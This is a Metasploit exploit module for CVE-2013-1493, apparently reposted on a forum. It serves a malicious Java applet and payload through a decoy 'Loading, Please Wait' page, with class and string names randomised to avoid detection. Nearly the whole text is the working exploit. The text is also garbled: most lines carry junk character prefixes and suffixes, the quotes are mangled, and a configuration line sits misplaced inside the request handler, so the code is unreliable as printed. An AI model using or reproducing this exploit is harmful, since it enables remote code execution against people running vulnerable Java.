##- k+ y a0 }8 g6 ^" X1 n- r1 S
- O; `* r( e! t& y1 X' D# This file is part of the Metasploit Framework and may be subject to
C1 |. ?/ B2 |, s3 y0 J, K! u# redistribution and commercial restrictions. Please see the Metasploit
" p) B! c. U( n" p. z* x# web site for more information on licensing and terms of use.8 g3 m5 i _$ F
# http://metasploit.com/
0 l$ j1 b0 S- P& k##
3 z" J: p" j4 z* w& H, S Brequire ‘msf/core’
. Z$ h: o! Z0 u2 drequire ‘rex’
4 k) U) `) D- Pclass Metasploit3 < Msf::Exploit::Remote! d! j5 X& e! \/ e) q9 I$ B
Rank = NormalRanking
$ V8 _& Q, {+ P4 g2 C9 @. binclude Msf::Exploit::Remote::HttpServer::HTML
8 }0 |9 M& l$ V- H ginclude Msf::Exploit::EXE
* E& l, b" }7 A- G8 x8 Minclude Msf::Exploit::Remote::BrowserAutopwn1 I9 {# f" W/ p% @# `
autopwn_info({ :javascript => false })
" v% B( \$ S1 t0 e' S- k+ Wdef initialize( info = {} )
+ g' |* {1 l3 Y8 Q$ Q- dsuper( update_info( info,
$ o- ]+ K% e2 w7 j% L" e: _‘Name’ => ‘Java CMM Remote Code Execution’,1 E3 M$ T# E0 K+ N* m
‘Description’ => %q{
4 g' I8 C) e5 E* o3 r: QThis module abuses the Color Management classes from a Java Applet to run) u* L; G# T: i* ~& ?' b: P n
arbitrary Java code outside of the sandbox as exploited in the wild in February. d9 P% [ V# I- L) {* s
and March of 2013. The vulnerability affects Java version 7u15 and earlier and 6u41+ N: \' w. ~$ C( c& F; j) i6 W
and earlier and has been tested successfully on Windows XP SP3 and Windows 7 SP1: |0 B8 D7 y; m1 ?% C& B4 L. B3 |
systems. This exploit doesn’t bypass click-to-play, so the user must accept the java) m" P- _: L$ ^7 Z/ D* R) {% \1 C+ p
warning in order to run the malicious applet.: u& u3 c+ `) g) H2 W
},
" T2 u1 Z2 B$ r‘License’ => MSF_LICENSE,
5 ?2 q# g' j6 _* C' o3 @‘Author’ =>$ k0 K$ u; ]! q v0 z
'Unknown', # Vulnerability discovery and Exploit9 o- G+ }! [0 b' q$ ^/ F
'juan vazquez' # Metasploit module (just ported the published exploit)
6 }' {3 K5 X+ a2 O; T- S8 O# N7 I5 w],
# x2 O* q3 P7 d* }/ q b‘References’ =>- G' ~" `6 Z: l0 m$ w3 T
[! j7 [" Z8 P: W* ^$ I1 }/ p
[ 'CVE', '2013-1493' ],
2 B# U1 l% m8 m4 w[ 'OSVDB', '90737' ],
]0 y1 z4 E/ Z# w[ 'BID', '58238' ],
* b1 a+ q0 R" o2 D( i: u; w[ 'URL', 'https://blogs.oracle.com/security/entry/security_alert_cve_2013_1493' ],; b$ G. [5 [: `* [& n
[ 'URL', 'http://www.oracle.com/technetwork/topics/security/alert-cve-2013-1493-1915081.html' ],
5 r v8 |2 P P; i[ 'URL', 'http://pastie.org/pastes/6581034' ]
% A1 o# I3 l) ?0 g2 z0 Z! O],, P# \* y9 Z6 W
‘Platform’ => [ 'win', 'java' ],
0 M# z9 L9 |" H6 O; h‘Payload’ => { ‘Space’ => 20480, ‘BadChars’ => ”, ‘DisableNops’ => true },
! z+ n/ V, `. r. }( `‘Targets’ =>
- ~1 V2 q. Q# q) T% y$ l; l' e% l[5 j' [$ h: D3 a5 ]+ S
[ 'Generic (Java Payload)',+ {- H( }- W c0 z- p
{
" Q# O* v& d2 H1 r- T0 u- Q* Y'Platform' => 'java',
' ~* w5 z6 \# x. z+ ~'Arch' => ARCH_JAVA
$ i0 o a0 R! L9 v}. y3 ?" V: \ l4 j; l) O
],2 i( [" V: }$ |5 v
[ 'Windows x86 (Native Payload)', l4 p1 ^& r K i4 [! {# U7 _, a
{
" M* K; ]+ E6 H' B- j* \2 D. U, E' B'Platform' => 'win',- G" K: l9 k! ?2 v
'Arch' => ARCH_X86, f$ E( K0 u) {. v5 f
}, C! V6 U3 ^ ]7 B3 y! W, [9 a6 ]
]
% i# y+ ^& \( F$ x],
6 [) v! O- M+ ^( P1 \‘‘DisclosureDate’ => ‘Mar 01 2013′
) d! I+ h# W+ l9 y))
* q8 O& Q, }- K: y8 Dend
/ O* t' I1 v( ^# w% }def setup" f7 H H# M8 p" i) Q
path = File.join(Msf::Config.install_root, “data”, “exploits”, “cve-2013-1493″, “Init.class”)
7 H$ l. u& O: J1 | ~! \* j+ Y@init_class = File.open(path, “rb”) {|fd| fd.read(fd.stat.size) }9 L- r9 d1 ?$ Z `* W% @. c
path = File.join(Msf::Config.install_root, “data”, “exploits”, “cve-2013-1493″, “Leak.class”)
8 _! {# T; E! v; w9 U3 [! k* A@leak_class = File.open(path, “rb”) {|fd| fd.read(fd.stat.size) }
- f5 ` R8 M4 d8 Spath = File.join(Msf::Config.install_root, “data”, “exploits”, “cve-2013-1493″, “MyBufferedImage.class”)1 \% W, r+ L- q2 E) F$ r, _
@buffered_image_class = File.open(path, “rb”) {|fd| fd.read(fd.stat.size) }
+ {0 H0 I$ F& Z* B. d" ~path = File.join(Msf::Config.install_root, “data”, “exploits”, “cve-2013-1493″, “MyColorSpace.class”)
. w7 u' O% @/ k. H7 S' C@color_space_class = File.open(path, “rb”) {|fd| fd.read(fd.stat.size) }
: B3 \0 T. l0 P+ {" h@init_class_name = rand_text_alpha(“Init”.length)
+ [" g: J! C& r& a' n3 p@init_class.gsub!(“Init”, @init_class_name)
; S9 P; ^6 }2 F1 k" K: X; _super& ^8 p1 ~6 I* |$ ~( W+ ]
end
5 M9 f* X3 H- _3 T9 N/ q' n3 Kdef on_request_uri(cli, request)
- W$ s0 f5 b4 X q* `7 aprint_status(“handling request for #{request.uri}”)
2 ]- K" ^' g+ |# z t2 Hcase request.uri" @+ s3 {" |4 e0 n- a+ g' m
when /\.jar$/i
% ~8 t4 _# x9 a4 x4 l: {jar = payload.encoded_jar
' _( F: q' ^8 T. P& N4 a" ^9 O( tjar.add_file(“#{@init_class_name}.class”, @init_class)
2 B+ w2 w Y6 j! X' A( Ujar.add_file(“Leak.class”, @leak_class)
. [& @* u# T& M. h9 R* A" gjar.add_file(“MyBufferedImage.class”, @buffered_image_class)
8 F( F+ ]0 }& xjar.add_file(“MyColorSpace.class”, @color_space_class)+ d4 c* v1 ^" Z7 R6 O2 j3 \) I0 e1 Z% i9 f
DefaultTarget’ => 1,; ]/ v* d2 F; D5 E$ y
metasploit_str = rand_text_alpha(“metasploit”.length)
7 k; [; w1 r9 z0 ppayload_str = rand_text_alpha(“payload”.length); O" I5 |' @9 j6 K+ t2 X
jar.entries.each { |entry|! ~% B ~! c! t5 X
entry.name.gsub!(“metasploit”, metasploit_str)
; e. q9 s J' X* Zentry.name.gsub!(“Payload”, payload_str)& |( B- x0 x6 v; J' P
entry.data = entry.data.gsub(“metasploit”, metasploit_str): d$ b. z* Y9 e* B$ A
entry.data = entry.data.gsub(“Payload”, payload_str)/ P) P+ d- c& {, | d; v' p- T
}2 {' S9 M( \! E5 }9 i! m+ E. E
jar.build_manifest
, I* ?3 `* x* c) \5 tsend_response(cli, jar, { ‘Content-Type’ => “application/octet-stream” })
8 P- \! f4 s% g1 C) i! mwhen /\/$/
' f3 c# ^8 e9 j( I) V0 T5 qpayload = regenerate_payload(cli)
- i' Q' {0 C h( y' o+ H3 X1 E8 h hif not payload G8 }+ _6 A: l ^) }) D8 I+ Q
print_error(“Failed to generate the payload.”)" v8 `$ ~0 ]& q( @- p
send_not_found(cli)- g! H. N: q; f2 k( Y8 b
return
" q- O2 M3 z8 S+ q. O, L9 ^end. _: ^5 f; W$ B }( A+ n* k3 W
send_response_html(cli, generate_html, { ‘Content-Type’ => ‘text/html’ })' g; x* ]. p3 N; s2 m) _, _' R
else: X5 r f; n: n, f
send_redirect(cli, get_resource() + ‘/’, ”)
b. _8 M) c( eend+ H2 `4 g I% c7 e# Y- }
end2 b6 E; i6 H* L- C# \+ Y* i
def generate_html( }/ K2 \0 D+ x2 I5 @6 ?2 D: y
html = %Q|<html><head><title>Loading, Please Wait…</title></head>|
1 v' W+ B3 D4 [6 j2 f8 X" k8 Mhtml += %Q|<body><center><p>Loading, Please Wait…</p></center>|
5 V+ l5 I9 r6 C, mhtml += %Q|<applet archive=”#{rand_text_alpha(8)}.jar” code=”#{@init_class_name}.class” width=”1″ height=”1″>|
) b% r8 ~6 K% nhtml += %Q|</applet></body></html>|
$ g6 g9 P& p2 ~' v* _* Creturn html
5 \( D) _+ @& T' N7 b9 q# lend
, M" I7 t* m: v8 h+ jend( h8 i3 m3 q9 ^; [+ i/ v! ~! Z; A3 f
end
- b% B8 g3 a# L4 N: L0 e( _ |
发表于 2013-4-4 17:31:17
收藏
支持
反对